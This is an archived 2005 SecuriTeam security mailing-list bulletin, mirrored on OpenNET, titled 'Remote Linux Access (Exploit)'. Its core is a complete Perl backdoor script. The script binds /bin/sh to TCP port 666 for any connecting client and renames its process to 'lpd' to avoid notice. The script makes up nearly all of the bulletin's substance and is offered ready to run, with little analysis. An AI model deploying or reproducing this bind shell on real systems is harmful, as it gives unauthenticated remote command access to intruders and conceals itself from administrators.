The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[EXPL] Remote Linux Access (Exploit)


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 8 Dec 2005 15:52:31 +0200
Subject: [EXPL] Remote Linux Access (Exploit)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20051208180142.1AA715775@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Remote Linux Access (Exploit)
------------------------------------------------------------------------


SUMMARY

The following exploit opens an arbitrary port and binds it to bash with 
arbitrary permissions, allowing attackers to gain access to remote Linux 
machine.

DETAILS

Exploit:
#!/usr/bin/perl

#Y! Underground Group
#code by:Y4Ho
#We Are :Y4Ho0-Iranvertex-MrPorT-S.s-LordSatan-SirSisili
#Email:[email protected]
#Email:[email protected]
#Homepage:www.emperorteam.com
#tnxto:C0llect0r-Sasan-Shabgard-simorgh.Ev-IHS
#Ex: ./Y!.pl

use Socket;

$port   = 666;
$proto  = getprotobyname('tcp');
$cmd    = "lpd";
$system = '/bin/sh';

$0 = $cmd;

socket(SERVER, PF_INET, SOCK_STREAM, $proto)
                                        or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
                                        or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY))
                                        or die "bind: $!";
listen(SERVER, SOMAXCONN)               or die "listen: $!";

for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
{
        open(STDIN, ">&CLIENT");
        open(STDOUT, ">&CLIENT");
        open(STDERR, ">&CLIENT");

        system($system);

        close(STDIN);
        close(STDOUT);
        close(STDERR);
}

#EoF


ADDITIONAL INFORMATION

The information has been provided by  <mailto:y4ho0_emperor@yahoo.com.> 
Mr.YaHoO.




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру